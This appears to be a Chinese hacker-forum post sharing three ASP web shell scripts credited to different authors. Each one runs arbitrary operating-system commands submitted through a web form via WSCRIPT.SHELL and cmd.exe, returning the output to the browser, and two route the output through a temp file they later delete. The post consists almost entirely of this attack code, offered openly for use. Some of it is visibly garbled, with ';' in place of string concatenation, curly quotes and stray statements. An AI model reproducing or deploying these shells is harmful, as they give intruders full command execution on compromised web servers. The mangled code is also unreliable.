蓝屏的原码在这儿:
免FSO的CMD.ASP带回显
<%@codepage=936%><%On Error Resume Next
if Request("ad")<>"" then response.status="401 not Authorized"
Set z=Server.CreateObject("WSCRIPT.SHELL")
T=Server.mappath("lp";year(date);Session.SessionID;".txt")
sz=Request("Ck")
If sz=""Then sz="set"
z.Run "%COMSPEC% /c^";sz;">";T,0,True
Response.Write "<FORM method=POST><input type=text name=Ck value=’";sz;"’> <input type=submit value=Run> <input type=reset value=RESET> <input type=submit
name=ad title=Pass
wordWantted value=RunAsAdmin></FORM><br>执行了[";sz;"]
{临时文件}[";T;"]<Iframe src=’lp";year(date);Session.SessionID;".txt’ width=9
9% height=99% frameborder=0></iframe>"
response.flush
for i=1 to 1800000
ys=9+9
next
z.run "%COMSPEC% /c echo Y│del ";T,1,True
set z=Nothing%>
lcx根据蓝屏的又改了一个,源码:
<%
Dim oScript
Dim szCMD, szTempFile ,del
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
szCMD = Request.Form(".CMD")
del=Request.Form("del")
If (szCMD <> " " ) Then
szTempFile = "d:";"l";year(date);".txt"
Call oScript.Run ("cmd.exe /c echo NO FSO ASPMM V0.0 by
www.icehack.com>" ; szTempFile, 0, True)
Call oScript.Run ("cmd.exe /c " ; szCMD ; " > " ; szTempFile, 0, True)
End If
If (del = "DELtempfile") Then
Call oScript.Run( "cmd.exe /c del ";szTempFile,0,True)
end if
%>
<FORM method="POST">
<input type=text name=".CMD" size=45 >
<input type=submit value="Run"> <input type=submit value="DELtempfile" name=del>
<%
Response.Write "<Iframe src=’d:l";year(date);".txt’ width=99% height=99%
frameborder=0></iframe>" %>
set oScrip=Nothing
%>
</form>
不用这么麻烦吧。瞧zzzevazzz的:
<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
";request.form("cmd")).stdout.readall%>
</textarea>
